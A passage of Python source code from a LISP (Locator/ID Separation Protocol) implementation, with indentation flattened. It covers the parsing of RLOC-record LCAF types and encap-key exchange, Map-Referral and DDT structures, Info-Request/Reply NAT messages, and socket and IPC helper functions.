self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral(object):
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry(object):
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node(object):
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request(object):
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (self.nonce in lisp_ddt_map_requestQ):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix with
# EID-prefix-AFI set to 0. EID appened below follows with hostname
# or AFI=0:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info(object):
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += (self.hostname + "\0").encode()
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info(object):
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source(object):
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
# Returns a byte string.
#
def lisp_packet_ipc(packet, source, sport):
header = "packet@{}@{}@{}@".format(str(len(packet)), source, str(sport))
return(header.encode() + packet)
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
# Returns a byte string.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
header = "control-packet@{}@{}@".format(dest, str(dport))
return(header.encode() + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
# Returns a byte string.
#
def lisp_data_packet_ipc(packet, source):
header = "data-packet@{}@{}@@".format(str(len(packet)), source)
return(header.encode() + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
# Returns a byte string. Variable "ipc" is a string.
#
def lisp_command_ipc(ipc, source):
packet = "command@{}@{}@@".format(len(ipc), source) + ipc
return(packet.encode())
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
# Returns a byte string. Variable "data" is a string.
#
def lisp_api_ipc(source, data):
packet = "api@" + str(len(data)) + "@" + source + "@@" + data
return(packet.encode())
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
# Variable "packet" is of type byte string. Caller must adhere. Since packet
# is going out a socket interface (even if internal).
#
